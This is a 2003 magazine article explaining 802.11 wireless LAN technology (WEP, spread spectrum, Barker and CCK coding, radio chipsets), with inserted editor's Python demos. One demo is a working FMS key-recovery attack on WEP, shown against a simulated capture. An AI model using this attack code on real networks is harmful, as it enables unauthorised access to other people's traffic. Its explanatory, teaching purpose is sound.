802.11
Core Technologies - The Basics
Copyright© 2003 Eddie Insam
email: edinsam@eix.co.uk
Published In Electronics World
Abstract Box
Following on from Ian Poole's article, Eddie Insam discusses some of the low-level technologies used in implementing Wireless Local Area Network standards.
There is something appealing about walking around the office or the house carrying a wireless-enabled laptop: slouching on a sofa, typing away, far from those open-plan jungles, not a filing cabinet in sight. Too hot? Walk out into the garden. Who says productivity cannot be improved by sitting by the pool with a glass of lemonade?
One thing we have certainly got used to over the years is the sophistication of the technology used to make these devices work. We simply take laptops, organisers and cellphones for granted. Many of us will not know exactly how the bits inside these things work, as their furious rate of development has meant that such information is hard to come by. We may even suspect that whatever is in there works on well-known techniques and on the same age-old concepts we all learnt at college. But none of that helps when we are confronted with the simplest of technical problems and feel completely demoralised and incompetent.
There is always the frustration of getting the things to work in the first place. We can buy a cellphone on the high street and it works more or less the minute we switch it on. WLANs are one of those technologies that do not benefit from such pleasant black magic. The scenario is all too typical: we go to a computer superstore, buy all the bits, books and manuals, and as soon as we get home or to the office we spend the best part of a day, if not more, trying to get it all to work. So be warned if you are intending to upgrade your office or house network to wireless: make sure you allocate enough time and keep away from children and pets who may get in the way. On the plus side, when it is all finished and working, you will have the satisfaction of being able to waste as much time as you like boring colleagues and friends by explaining how you got it all to work (or not, as the case may be).
This article is not an installation or help guide. The writer is possibly one of the least qualified persons to write one, as he hasn't even got his own system working properly yet. However, the article contains some useful basic pointers on how the technology works, and may help in deciding where the problem areas are and in planning for the future.
Basic Architecture and Security
A Wireless Local Area Network (WLAN) is based on an architecture consisting of one or more radio cells. Each cell is called a Basic Service Set (BSS) and has a limited signal range depending on the power used, the environment and, most importantly, the presence of other sources of interfering radio energy in the area. In practice, coverage is limited to a few hundred square metres, and it can be a lot less in built-up areas. Each cell is controlled by a base station called an Access Point (AP). The simplest WLAN consists of a single cell with a single AP and one or more roaming wireless users, although it is also possible to run a cell without an AP, with the stations talking directly to each other (an ad hoc, or independent, BSS). The AP is connected to the rest of the LAN in the building via Ethernet or other existing wired infrastructure. Wireless stations can roam freely around a cell's radio area, walk into a cell controlled by a different AP, and enter cells allocated to other networks. Protocol software ensures that wandering stations are recognised and enumerated as they fade in and out of reach, or in and out of the different Access Points' ranges.
The radio ranges of the cells can overlap. This does not matter too much, as different radio channels can be assigned to each cell. This makes installation and planning easy: there is no need to worry about overlaps, just ensure there are no "no coverage" black spots. (The caveat, covered later, is that the 2.4GHz band only has room for three non-overlapping DSSS channels, so in a dense installation some cells will have to share a channel.) Because data communications are packet based and acknowledged, with lost packets retransmitted, fade-outs and small black spots tend to go unnoticed, and the user sees a continuous connection between laptop and base station.

Fig 1 Caption: WLAN cells have a limited range and multiple cells can co-exist. The base station software keeps track of which remote belongs to which network.
This free wandering scheme also means that unauthorised stations can easily listen in to, or join, our networks. A WLAN-enabled laptop can conceivably log in to any network within radio range; after all, the radios all work in a similar way and use the same frequencies. Many readers will have seen news features on TV about "hackers" sitting in the back of taxicabs or in coffee houses, logging into nearby office networks at will. This is because many network operators do not bother to enable any kind of security, leaving their networks open for snooping by anybody within radio range.
The IEEE 802.11 standards provide an encryption mechanism based on the RC4 stream cipher, called Wired Equivalent Privacy (WEP). In practice, even this scheme can be breached (see reference): WEP forms the RC4 key from a secret key shared by every station in the network plus a 24-bit initialisation vector (IV) that is sent in clear with each frame, and the Fluhrer, Mantin and Shamir attack recovers the secret key from a large number of passively captured frames (a few million in the cited demonstration). WEP should therefore be treated as a deterrent rather than as real confidentiality.
Chasing unsecured networks in cities has given rise to the activity of "warchalking", where hackers with laptops mark the areas of coverage of local radio networks using chalk signs on the pavement outside offices. The marks indicate the network name (SSID), whether the node is open or WEP-protected, and the bandwidth available. Wireless networks are not a secure system.

Fig 2
Caption: A sign you would not like to find on the pavement outside your office!
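The attack on WEP referred to above (see reference), simulated end to end as an added example. This is the editor's illustration, not code from the article or from the cited report. It assumes a 5-byte (40-bit) WEP key chosen for the demonstration, and a constructed capture that contains only the "weak" IVs of the form (A+3, 255, X) that the attack waits for; a real capture contains every IV the network happens to use, of which these are a small fraction.

```python
"""
Added example (editor's illustration, not from the article): the Fluhrer,
Mantin and Shamir (FMS) attack on WEP, simulated end to end.

WEP builds its RC4 key as IV || secret key and sends the 24-bit IV in clear.
The first plaintext byte of every data frame is the fixed 802.2 SNAP value
0xAA, so a sniffer learns the first keystream byte of every frame.
Assumed here: a 5-byte (40-bit) key, and a constructed capture holding only
the weak IV class (A+3, 255, X) for each key byte position A.
"""

N = 256
SNAP_FIRST_BYTE = 0xAA


def rc4_ksa(key, steps=N):
    """RC4 key scheduling, optionally stopped after `steps` rounds.
    Returns the permutation S and the index j at that point."""
    S = list(range(N))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) % N
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_first_keystream_byte(key):
    """First byte of the RC4 PRGA output for this key."""
    S, _ = rc4_ksa(key)
    i, j = 1, S[1]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) % N]


def wep_first_cipher_byte(iv, secret_key):
    """What a sniffer sees: first ciphertext byte of a WEP frame sent with this IV."""
    return SNAP_FIRST_BYTE ^ rc4_first_keystream_byte(list(iv) + list(secret_key))


def simulate_capture(secret_key):
    """Constructed capture: (IV, first ciphertext byte) pairs for the weak IVs
    (A+3, 255, X).  A real capture would also hold millions of other IVs."""
    captured = []
    for A in range(len(secret_key)):
        for X in range(N):
            iv = (A + 3, N - 1, X)
            captured.append((iv, wep_first_cipher_byte(iv, secret_key)))
    return captured


def fms_votes(captured, known):
    """Vote table for key byte A = len(known), given the recovered prefix."""
    A = len(known)
    votes = [0] * N
    for iv, c0 in captured:
        z = c0 ^ SNAP_FIRST_BYTE           # first keystream byte (known plaintext)
        # Replay the KSA only through the key bytes the attacker already knows.
        S, j = rc4_ksa(list(iv) + known, steps=A + 3)
        # FMS 'resolved' condition: the first PRGA output will be S[A+3] unless
        # the remaining KSA rounds disturb positions 1, S[1] or A+3 (about 95% do,
        # so the vote below is right roughly 5% of the time and random otherwise).
        if S[1] >= A + 3 or (S[1] + S[S[1]]) % N != A + 3:
            continue
        votes[(S.index(z) - j - S[A + 3]) % N] += 1
    return votes


def fms_recover_key(captured, key_len, branch=5):
    """Depth-first search over the best-voted candidates for each byte; each
    complete candidate key is verified against a few captured frames."""
    check = captured[:8]

    def search(known):
        if len(known) == key_len:
            ok = all(wep_first_cipher_byte(iv, known) == c0 for iv, c0 in check)
            return bytes(known) if ok else None
        votes = fms_votes(captured, known)
        for cand in sorted(range(N), key=lambda b: -votes[b])[:branch]:
            found = search(known + [cand])
            if found is not None:
                return found
        return None

    return search([])


if __name__ == "__main__":
    key = bytes([0x1F, 0x8B, 0x44, 0xE2, 0x9C])   # demo key, constructed
    frames = simulate_capture(key)
    print("captured %d weak-IV frames" % len(frames))
    print("recovered %s (actual %s)" % (fms_recover_key(frames, len(key)).hex(), key.hex()))
```

The "resolved" test and the candidate formula are the FMS observations: for such IVs the first keystream byte depends, about one time in twenty, only on the IV and on the key bytes before the one being attacked, and since the first plaintext byte of every frame is fixed, that keystream byte is known. A vote across a couple of hundred frames per key byte picks out the right value; the depth-first check of the best few candidates against captured frames is the verification step the AT&T report used to cope with noisy votes. Nothing in the attack needs the attacker to transmit.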
Why those frequency allocations?
The choice of frequencies for WLANs in the gigahertz range was dictated by the availability of large chunks of spectrum in the Industrial, Scientific and Medical (ISM) radio bands. These allocations in the 900MHz, 2.4GHz and 5GHz bands are available in much of the world, so a worldwide standard could be derived. At the same time, the development of low-cost miniature microwave components has resulted in very cheap RF modules. The net result is a range of very low-cost products using these frequencies. No wonder similar technologies such as Bluetooth, HomeRF, ZigBee, RF tags and video senders share the benefits (and contribute to the cross-interference).
At present, the most popular frequency is the 2.4GHz band, with the 802.11b standard (marketed as Wi-Fi) the most popular scheme for networking. There may be a move to 5GHz in the future, once the present band becomes clogged with interference. Oddly enough, the end effect of interference pollution is range reduction rather than making the band unusable (as it would be for AM broadcast), so expect the present band arrangement to stay for a long time.
Two bodies shaped the current WiFi standards: the FCC in the USA, which as regulator wrote the rules for unlicensed use of the ISM bands, and the IEEE, which wrote the standards themselves through its Project 802 (the number is commonly said to come from the project's start date, February 1980: 80-2). At the time, the IEEE wanted to ensure that the new standards were compatible with the other local and wide area network standards then being defined. They also wanted the standards to be more or less independent of the transmission medium, so the 802.11 WLAN standard applies not only to radio as the carrier, but also to infrared.
The first wireless standard to be ratified was 802.11, which defined methods for data transfer at 1Mbps and 2Mbps using either frequency hopping spread spectrum (FHSS) or direct sequence spread spectrum (DSSS) over radio, or pulse position modulation (PPM) over infrared. Commercial pressure to make the standards more comparable with fast wired Ethernet resulted in improved specifications and higher bandwidths (in exchange for fewer channels and reduced range). The enhanced 802.11b option offered 5.5Mbps and 11Mbps using more advanced modulation schemes. The penalty to pay was a reduction in the number of coexisting networks in the band (three non-overlapping DSSS channels, as opposed to 79 FHSS hop channels). Further enhancements defined in 802.11g increased the data rate to 54Mbps in the 2.4GHz band. Similarly, for the 5GHz band, 802.11a defined various data rates up to 54Mbps. As these wider-band systems were meant to operate over very short distances (e.g. within a room), problems of coexistence and interference with other networks became less of an issue.
The two radio-based spread spectrum methods, FHSS and DSSS, were adapted by the standards to conform to the rather strict FCC regulations (Part 15.247) that control the use of the ISM bands. The FCC established these operating rules specifically to facilitate shared use of the band for the transmission of data and voice by multiple users in an unlicensed environment. Spread spectrum techniques were mandated in order to minimise interference with the other services in the band. For example, analogue video senders and microwave ovens operate at a fairly constant carrier frequency, and packet transmission combined with spread spectrum can (at least in theory) go some way towards avoiding interference with them. The extra complexity required of the radios is no problem with current miniaturisation techniques. However, efficient decoding of spread spectrum signals demands extra qualities of the receiver, such as extended dynamic range, which in many cases have not yet been achieved in low-cost parts.
The task at hand - differences between wired and wireless networks
At first sight, communication by radio may appear to be a simple task: one station transmits while the other receives, and if the packets sent fail a checksum at the receiver, the receiver asks for a retransmission. Is this all there is to it? Well, the collection of 802 standards easily fills a bookshelf, and the part relating to wireless systems is by itself quite a fat volume, so there is obviously a bit more to it. What needs to be realised is the number of tasks a wireless network has to deal with. In addition, the wireless medium is drastically different from standard Ethernet (a wired medium). This is why the specifications covering Ethernet were not just extended to operate in a wireless environment. The main differences are:
Shared boundaries: wireless has neither absolute nor observable boundaries. In geographical terms, the medium can be shared with other similar wireless networks operating in different domains, including somebody else's computer network. Stations can wander in and out of our, and other people's, domains while communicating, and anyone within radio range can receive every frame that is sent.
Lack of full connectivity: in a wireless environment we cannot assume that all stations hear each other (which is the basic assumption of a wired Ethernet system). The fact that a transmitting station senses the medium around it as free does not necessarily mean that the medium is free around the receiver (the "hidden station" problem).
Time-varying propagation: signal levels may change drastically or fade out completely for relatively long periods during a session.
Destination address does not necessarily mean destination location: in wired LANs an address is always related to a physical location. In wireless LANs, an address identifies a message destination, which is not necessarily at a fixed location.
Real-time collision detection is impractical, because it would require full-duplex radio sets. Collisions can only be inferred (typically from a missing acknowledgement) rather than actively detected, so the MAC has to avoid them rather than detect them.
In wired systems, medium error rates are minimal and error management is usually left to the higher layers of a protocol. A typical radio link must tolerate much higher error rates, which implies that wireless systems must include some form of error detection and retransmission at the link level.
The standards and encoding methods used
As with other IEEE 802 protocols, 802.11 defines a Medium Access Control (MAC) layer, which deals with addressing and packet management, and a Physical Layer (PHY), which deals with the medium itself. The standards define a single MAC that interacts with any of three PHY options: FHSS, DSSS and infrared. Of these, DSSS is used in most implementations today; FHSS and infrared are rarely used.
For FHSS, 802.11 defines a 1Mbps rate using two-level Gaussian frequency shift keying (2GFSK), with an optional 2Mbps rate using four-level keying (4GFSK). This is basically a frequency modulation scheme in which binary ones and zeros are represented by two (or four) closely spaced frequencies. In addition, the centre frequency is made to jump around the 79 allocated channels in the band in a pseudorandom (PN) sequence, with the receiver tracking the transmitter because both generate the same timed PN sequence. FSK is preferred in FHSS systems because it is difficult for the hopping synthesiser to maintain phase coherence across the wide hopping bandwidth, and FSK is also relatively easy to demodulate non-coherently. The centre frequencies of the 79 channels are defined in 1MHz steps beginning at 2.402GHz and ending at 2.480GHz (similar allocations are defined for Europe and Japan). The hop rate itself is not fixed by the specification, but 802.11 requires a minimum of 2.5 hops per second. In order to maintain the 1MHz channel spacing and keep within the strict FCC bandwidth requirements, the frequency deviation is kept small (a maximum of about ±160kHz, a modulation index of roughly 0.32), which is a non-optimal modulation scheme. One side effect is that attempts to increase channel capacity by adding more levels run into a poor signal-to-noise trade-off. In other words, narrow FSK becomes impractical for higher-capacity systems because of the prohibitively high signal-to-noise ratios required within the constrained bandwidth.
Where more bandwidth is required, a DSSS approach is used. Like FHSS, DSSS uses a PN code to spread the signal. The DSSS encoding used in 802.11b is not new; similar technology is used in GPS satellite navigation and in CDMA cellular telephones. In the basic 1Mbps DSSS system, the 1Mbps information stream is combined via an exclusive-OR (XOR) function with a high-speed pseudo-random sequence running at 11MHz. The PN specified by 802.11 is an 11-chip Barker code, a sequence chosen for its autocorrelation properties: correlating it with a shifted copy of itself gives a peak of 11 at zero offset and side lobes no larger than 1 at any other offset, which makes synchronisation and detection easy. The term chip, rather than bit, denotes the positions in a PN sequence, to reflect the fact that the Barker code itself carries no information. The result of the XOR operation is an 11Mchip/s digital stream, which is then modulated onto the 2.4GHz carrier using Differential Binary Phase Shift Keying (DBPSK), i.e. the carrier phase is inverted or not inverted depending on the transitions in the incoming binary data. The effect of the pseudo-random modulation (or scrambling) is to spread the bandwidth of the transmitted signal by a ratio of 11:1 (hence the term "spread spectrum"). The main lobe of the resulting signal is about 22MHz wide, and the power spectral density is reduced by the same 11:1 ratio. Non-overlapping DSSS channels must be spaced about 25MHz apart, so at most three DSSS networks can coexist in the 2.4GHz band (note how the use of DSSS reduces the original 79-channel capacity to three non-overlapping users). On reception, the signal is recovered by correlating it with a locally generated copy of the same chip sequence. The correlation process has a significant benefit: narrow-band interference falling in the band is reduced by the same 11:1 ratio, an effect known as processing gain (10.4dB for an 11-chip code).

Fig 3 Caption: Spread spectrum is simply
obtained by XORing the data stream with a much faster, predictable
"chip" sequence. This has the effect of spreading the transmitted
power over a wider band. The receiver must be able to receive the whole
bandwidth and recover the original data stream using an inverse process.
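The spreading and despreading just described, worked through as an added example (editor's code, not from the article). It uses the 802.11 Barker sequence and a constructed channel: an interfering tone that varies slowly compared with the chip rate, plus Gaussian noise from a fixed seed. It shows the autocorrelation property of the code, the 11:1 processing gain against the tone, and the data bits surviving an interferer three times larger than the chips.

```python
"""
Added example (editor's code, not from the article): 1Mbps 802.11 DSSS
spreading with the 11-chip Barker code, the correlator that despreads it,
and the processing gain this gives against a narrow-band interferer.
The channel model (slow tone plus Gaussian noise, fixed seed) is constructed.
"""
import math
import random

# The 802.11 Barker sequence, written as +1/-1 chips.
BARKER_11 = [+1, -1, +1, +1, -1, +1, +1, +1, -1, -1, -1]
CHIPS_PER_BIT = len(BARKER_11)


def spread(bits):
    """XOR each data bit with the chip sequence.  In +1/-1 form a data 1
    simply inverts the Barker code, so one bit becomes 11 chips (11:1)."""
    chips = []
    for bit in bits:
        sign = -1 if bit else +1
        chips.extend(sign * c for c in BARKER_11)
    return chips


def despread(samples):
    """Correlate each 11-sample block with the local Barker replica.  The
    correlation peak is +11 or -11 for a clean signal; its sign is the bit."""
    bits, peaks = [], []
    for k in range(0, len(samples) - CHIPS_PER_BIT + 1, CHIPS_PER_BIT):
        block = samples[k:k + CHIPS_PER_BIT]
        peak = sum(s * c for s, c in zip(block, BARKER_11))
        peaks.append(peak)
        bits.append(0 if peak > 0 else 1)
    return bits, peaks


def autocorrelation(code):
    """Aperiodic autocorrelation at each shift: a main peak equal to the code
    length and side lobes of magnitude at most 1 are the Barker property."""
    n = len(code)
    return [sum(code[i] * code[i + shift] for i in range(n - shift))
            for shift in range(n)]


def channel(chips, tone_amplitude, noise_sigma, seed=1):
    """Constructed channel: an interfering tone that is slow compared with the
    11MHz chip rate (period 200 chips) plus white Gaussian noise."""
    rng = random.Random(seed)
    out = []
    for n, c in enumerate(chips):
        tone = tone_amplitude * math.cos(2 * math.pi * n / 200.0)
        out.append(c + tone + rng.gauss(0.0, noise_sigma))
    return out


def interference_comparison(tone_amplitude=3.0, blocks=20):
    """The same tone (no data, no noise) as seen by a receiver that merely
    integrates over one bit period and by the Barker correlator.  Returns
    both peaks; their ratio is the processing gain, close to 11:1."""
    tone = channel([0.0] * (CHIPS_PER_BIT * blocks), tone_amplitude, 0.0)
    integrated = max(abs(sum(tone[k:k + CHIPS_PER_BIT]))
                     for k in range(0, len(tone), CHIPS_PER_BIT))
    _, peaks = despread(tone)
    return integrated, max(abs(p) for p in peaks)


def processing_gain_db():
    return 10 * math.log10(CHIPS_PER_BIT)


if __name__ == "__main__":
    data = [0, 1, 1, 0, 1, 0, 0, 1, 1, 1, 0, 0, 1, 0, 1, 1]
    rx_bits, _ = despread(channel(spread(data), tone_amplitude=3.0, noise_sigma=0.5))
    print("bits recovered intact:", rx_bits == data)
    print("Barker autocorrelation:", autocorrelation(BARKER_11))
    print("tone seen by integrator / by correlator: %.1f / %.1f" % interference_comparison())
    print("processing gain: %.1f dB" % processing_gain_db())
```

The interferer is modelled as a tone that is almost constant over the 11 chips of one bit. A receiver that simply integrates over a bit period sees it add up coherently, while the correlator multiplies it by the Barker chips first, whose sum is only +1, so the tone is suppressed by roughly the code length. Wide-band noise is not suppressed this way: it adds up in power rather than in amplitude, which is why the article later stresses receiver dynamic range.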
In the 2Mbps DSSS option, the modulation is Differential Quadrature Phase Shift Keying (DQPSK), which doubles the bit rate without increasing the radio bandwidth. This is done by modulating both the in-phase and quadrature versions of the RF carrier (I and Q modulation); the penalty is a somewhat smaller noise margin per symbol.
The faster 5.5Mbps and 11Mbps DSSS options use Complementary Code Keying (CCK) to carry more bits per symbol while maintaining the same overall bandwidth. In CCK the chip rate stays at 11Mchip/s, but the spreading sequences are 8 chips long (as opposed to the 11-chip Barker code) and the choice of sequence itself carries information. At 11Mbps, 8 data bits are carried in each symbol: 6 of them select one of 64 codewords and the other 2 set the phase of the whole codeword by differential QPSK, giving 256 possible transmitted chip sequences per symbol. Each codeword is a set of 8 complex (I and Q) chips. The codewords are derived from complementary codes, which are in turn related to Hadamard and Walsh functions, and have low cross-correlation with one another (a subset of them are mutually orthogonal), so the receiver can detect a symbol with a bank of 64 parallel matched filters, each "tuned" to one codeword, followed by a decision stage that selects the largest output and then reads the symbol phase from it. The 5.5Mbps option works in the same way but carries 4 bits per symbol: 2 select one of four codewords and 2 set the DQPSK phase.
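The 11Mbps CCK encoder and the matched-filter bank described above, as an added example (editor's code, not the article's or any chipset vendor's). The codeword formula is the one 802.11b specifies; the mapping of the data byte onto the four phases is an assumed simplification, and the standard's Gray-coded dibit table and its differential encoding from one symbol to the next are not reproduced.

```python
"""
Added example (editor's code, not from the article): the 11Mbps CCK encoder
and the bank of 64 matched filters that decodes it.  The codeword formula is
the 802.11b one; the byte-to-phase mapping is an assumed simplification.
"""
import cmath
import math
import random

QPSK = [0.0, math.pi / 2, math.pi, 3 * math.pi / 2]   # phase for a dibit 0..3


def cck_codeword(phi1, phi2, phi3, phi4):
    """Eight complex chips built from four phases: phi1 rotates the whole
    word, phi2..phi4 select which of the 64 words is sent."""
    def e(*phis):
        return cmath.exp(1j * sum(phis))
    return [e(phi1, phi2, phi3, phi4), e(phi1, phi3, phi4),
            e(phi1, phi2, phi4),      -e(phi1, phi4),
            e(phi1, phi2, phi3),       e(phi1, phi3),
            -e(phi1, phi2),            e(phi1)]


def correlate(received, codeword):
    """One matched filter: complex correlation over the 8 chips."""
    return sum(r * c.conjugate() for r, c in zip(received, codeword))


def selecting_phases(index):
    """Codeword index 0..63 -> (phi2, phi3, phi4), two bits each."""
    return QPSK[index & 3], QPSK[(index >> 2) & 3], QPSK[(index >> 4) & 3]


# One reference codeword (phi1 = 0) per matched filter in the bank.
CODEBOOK = [cck_codeword(0.0, *selecting_phases(i)) for i in range(64)]


def encode_byte(value):
    """Assumed mapping: bits 0-5 pick the codeword, bits 6-7 set phi1."""
    return cck_codeword(QPSK[(value >> 6) & 3], *selecting_phases(value & 0x3F))


def decode_symbol(received):
    """Run all 64 matched filters, take the largest output, then read the
    symbol phase from that output's angle."""
    outputs = [correlate(received, word) for word in CODEBOOK]
    index = max(range(64), key=lambda i: abs(outputs[i]))
    angle = cmath.phase(outputs[index]) % (2 * math.pi)
    phi1_dibit = int(round(angle / (math.pi / 2))) % 4
    return index | (phi1_dibit << 6)


def cross_correlation_magnitude(i, k):
    """|correlation| between codewords i and k: 8 for i == k, zero only when
    one of the three selecting phases differs by pi, otherwise in between.
    The words are therefore not all orthogonal, which is why the detector
    picks the largest output rather than looking for the single non-zero one."""
    return abs(correlate(CODEBOOK[i], CODEBOOK[k]))


def add_noise(chips, sigma, seed):
    """Constructed complex Gaussian noise with a fixed seed."""
    rng = random.Random(seed)
    return [c + complex(rng.gauss(0.0, sigma), rng.gauss(0.0, sigma)) for c in chips]


def byte_errors(noise_sigma=0.0):
    """Encode and decode every byte value; returns the number of wrong decodes."""
    return sum(1 for v in range(256)
               if decode_symbol(add_noise(encode_byte(v), noise_sigma, seed=v)) != v)


if __name__ == "__main__":
    print("clean byte errors:", byte_errors())
    print("noisy byte errors:", byte_errors(0.1))
    print("|corr| same word / pi apart / pi/2 apart: %.2f %.2f %.2f" % (
        cross_correlation_magnitude(0, 0), cross_correlation_magnitude(0, 2),
        cross_correlation_magnitude(0, 1)))
```

Writing out the correlation of two codewords shows why the bank works: the sign pattern cancels and the sum factorises into a product of three terms of the form (1 + e^{j delta}) over the three selecting phases, so the output is 8 for the correct word, exactly zero when any selecting phase differs by pi, and between 0 and 8 otherwise. The largest output is always the transmitted word, and its angle is the DQPSK phase carrying the remaining two bits.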
How do the radios work?
By radios, we really mean chipsets. Most manufacturers offer IC combinations that can be assembled onto PCBs to form complete radios. A typical chipset is the Intersil PRISM family. These are based around common modules such as RF amplifier, TX power driver, IF amplifier, mixer, baseband processor, and a MAC logic interface to the host or network. A number of supporting ICs include PLLs, transmit/receive switches, and passives such as coils, crystals and band-pass elements.
The signal from the built-in 2.4GHz aerial is connected via passive band-pass filters to the TX/RX switch, which may also contain an RF amplifier and a programmable-power TX amplifier. The signal path now splits into TX and RX channels. Both are connected to the RF/IF chip, which mixes the signal down to an intermediate frequency of around 280MHz. The local oscillator is a VCO in a PLL controlled by serial commands from the control microprocessor; it ranges between 2132MHz and 2204MHz to give the required IF for each channel. The use of a relatively low IF makes filtering much easier, although the latest generation of radios can now mix directly from 2.4GHz to baseband without an IF stage.

Fig 4
Caption: front end of a typical 802.11b radio. These simple designs lack
sophistication in terms of signal handling, but are perfectly adequate for the
short distances involved. Both transmit and receive gains are constantly
controlled to ensure a fixed voltage at the detectors. The latest generation of
radios do not use intermediate frequencies and convert directly to baseband
from RF.
Discrete band-pass IF filters limit the bandwidth to just under 20MHz, enough to isolate one channel. The IF signal then passes through two limiting amplifiers and further 280MHz SAW band-pass filtering. The purpose of the limiters is to hold the amplitude of the signal at a relatively fixed value (around 200mV) under all input conditions. This levelling is in addition to the AGC provided by the variable-gain RF and IF stages. The integrated receivers have limited intrinsic dynamic range, and their gain needs to be adjusted carefully by the control microprocessor so that the radio's output levels stay relatively constant in amplitude. In practice, both RF and IF amplifiers are fed with an AGC signal derived from a D/A converter to provide this compensation.
The signal is then demodulated to baseband using two quadrature multipliers operating at the IF frequency. The reference is a locally generated phase-locked VCO running at 560MHz, twice the IF, a common arrangement that lets a divide-by-two stage produce the two 280MHz references exactly 90 degrees apart. The two resulting quadrature outputs are low-pass filtered and fed to the baseband processor. Here, the two signals are analogue-to-digital converted by wideband 3-bit converters at a rate of 22Msps, giving two 3-bit samples per input chip. At this point the signals are still spread-spectrum baseband signals of constant vector amplitude: each of the I and Q inputs may vary in amplitude, but their vector sum is constant. The baseband processor then correlates the signal with a locally generated PN spreading sequence to remove the spreading and uncover the differential BPSK (or QPSK) data.
At this point the data packets, which now resemble MAC frames, are fed to the MAC processor (not shown). Every transmission starts with a PHY preamble and a short PLCP header (start frame delimiter, data rate, length and a 16-bit CRC over the header), followed by the IEEE 802.11 MAC frame itself, which carries its own header and ends in a 32-bit cyclic redundancy check, the frame check sequence (FCS). The PHY uses the preamble and header to locate the start of frame and determine the rate and length of the incoming message; the MAC then checks the FCS, processes the frame header and, if the frame is addressed to this station, passes the data through the bus interface to the host computer. If the FCS fails, the frame is silently discarded and no acknowledgement is sent; the sender, seeing no acknowledgement within the expected time, retransmits the frame, as specified in the IEEE protocol.
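The FCS check the MAC performs, as an added example (editor's code, not the article's). It assembles an 802.11 data frame from constructed fields, verifies the 32-bit FCS (the same CRC-32 polynomial as Ethernet, stored least-significant byte first) and decodes the fields a driver or a packet sniffer reads, including the Protected (WEP) flag and the clear-text IV and key index that attacks on WEP make use of. The MAC addresses and payload are made up, the body is not actually encrypted, and the 4-byte ICV that WEP places inside the encrypted body is omitted.

```python
"""
Added example (editor's code, not from the article): the frame check the MAC
performs.  Builds an 802.11 data frame from constructed fields, verifies its
32-bit FCS and decodes the header fields a driver or sniffer reads.  MAC
addresses and payload are made up; no encryption is applied to the body.
"""
import struct
import zlib

TYPE_DATA = 2
FLAG_TO_DS, FLAG_FROM_DS, FLAG_RETRY, FLAG_PROTECTED = 0x01, 0x02, 0x08, 0x40


def fcs(header_and_body):
    """802.11 FCS: CRC-32 (same polynomial as Ethernet) over everything
    before it, appended least-significant byte first."""
    return struct.pack("<I", zlib.crc32(header_and_body) & 0xFFFFFFFF)


def build_data_frame(addr1, addr2, addr3, body, seq=0, from_ds=True,
                     protected=False, iv=b"\x00\x00\x00", key_id=0):
    """Frame control, duration, three addresses, sequence control,
    optional WEP IV/key-id header, body, FCS."""
    fc0 = TYPE_DATA << 2                 # protocol version 0, type data, subtype 0
    fc1 = (FLAG_FROM_DS if from_ds else 0) | (FLAG_PROTECTED if protected else 0)
    header = (bytes([fc0, fc1]) + struct.pack("<H", 0)      # duration/ID
              + addr1 + addr2 + addr3
              + struct.pack("<H", (seq & 0xFFF) << 4))      # fragment 0, sequence number
    if protected:
        # WEP sends the 3-byte IV in clear, then a byte whose top two bits
        # select one of four shared keys.  (The ICV inside the body is omitted.)
        header += iv + bytes([(key_id & 3) << 6])
    frame = header + body
    return frame + fcs(frame)


def mac_str(six_bytes):
    return ":".join("%02x" % b for b in six_bytes)


def parse_data_frame(frame):
    """Verify the FCS first: a frame that fails it is discarded by the MAC
    without acknowledgement.  Then decode the header."""
    if len(frame) < 28:
        raise ValueError("frame too short for a data frame with FCS")
    body, trailer = frame[:-4], frame[-4:]
    if fcs(body) != trailer:
        return {"fcs_ok": False}
    fc0, fc1 = body[0], body[1]
    info = {
        "fcs_ok": True,
        "type": (fc0 >> 2) & 3,
        "subtype": fc0 >> 4,
        "to_ds": bool(fc1 & FLAG_TO_DS),
        "from_ds": bool(fc1 & FLAG_FROM_DS),
        "retry": bool(fc1 & FLAG_RETRY),
        "protected": bool(fc1 & FLAG_PROTECTED),
        "addr1": mac_str(body[4:10]),
        "addr2": mac_str(body[10:16]),
        "addr3": mac_str(body[16:22]),
        "seq": struct.unpack("<H", body[22:24])[0] >> 4,
    }
    offset = 24
    if info["protected"]:
        info["iv"] = body[24:27].hex()
        info["key_id"] = body[27] >> 6
        offset = 28
    info["payload"] = body[offset:]
    return info


if __name__ == "__main__":
    ap = bytes.fromhex("020000000001")    # constructed, locally administered
    sta = bytes.fromhex("020000000002")
    frame = build_data_frame(sta, ap, ap, b"\xaa\xaa\x03" + b"hello", seq=42,
                             protected=True, iv=b"\x03\xff\x10", key_id=1)
    print(parse_data_frame(frame))
    damaged = bytearray(frame)
    damaged[30] ^= 0x01                   # one flipped bit in the body
    print(parse_data_frame(bytes(damaged)))
```

Two things worth noticing from a security point of view: the FCS protects against channel errors only, since anyone can compute it for a forged frame, and every header field including the WEP IV is readable by any station in range whether or not it is a member of the network.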

Fig 5 Caption: The baseband detector uses quadrature demodulation and simple three-bit A/D converters sampling at twice the chip rate to feed the all-digital correlator (despreader).
The baseband processor also includes methods for synchronising the link and establishing timing relationships. The system initially uses simple differential detection to identify and lock onto the signal. It then measures carrier and symbol timing phase and frequency and uses these to initialise tracking loops for fast acquisition. Once demodulating and tracking, the processor switches to coherent demodulation for best performance.
For transmission, the baseband processor scrambles the packet and differentially encodes it before applying the spread spectrum modulation. The data can be either DBPSK or DQPSK modulated and is produced as a baseband quadrature signal with I and Q components: the chip sequence is modulated onto the I and Q data components. The single-bit I and Q transmit outputs from the baseband processor are low-pass filtered and applied to the quadrature IF modulator. The IF signal is band-pass filtered and applied to the up-mixer, and a variable-gain RF amplifier feeds the transmit aerial with a controlled signal, so that no more RF power than necessary is transmitted.
A word on spread spectrum
Spread spectrum techniques can be used to improve the performance of a communications channel. However, for a receiver to realise this potential, it must be designed to a higher specification than its conventional counterpart. Specifically, it must be able to detect small wanted signals in the presence of large amounts of background noise and interference, which implies much better linearity and dynamic range. Many simple WLAN radios do not possess such characteristics, with a corresponding degradation in performance. Remembering that WLAN systems are designed to work within a very local environment, this is not much of a problem.
The Future
The fast growth of the use of these bands will ensure they become saturated sooner rather than later. With the proliferation of 2.4GHz equipment and interference, the bands are bound to get congested very quickly. The net result will be reductions in range to feet rather than yards. Any forward planning for the use of equipment in this band must take this into consideration.
The Author
Dr Eddie
Insam is a consultant in innovative applications of telecommunications and
specialises in graphics and signal processing. He can be reached on
edinsam@eix.co.uk.
For More Information
To obtain the full set of relevant IEEE standards, visit the IEEE website, or enter "802 IEEE" into any online search engine.
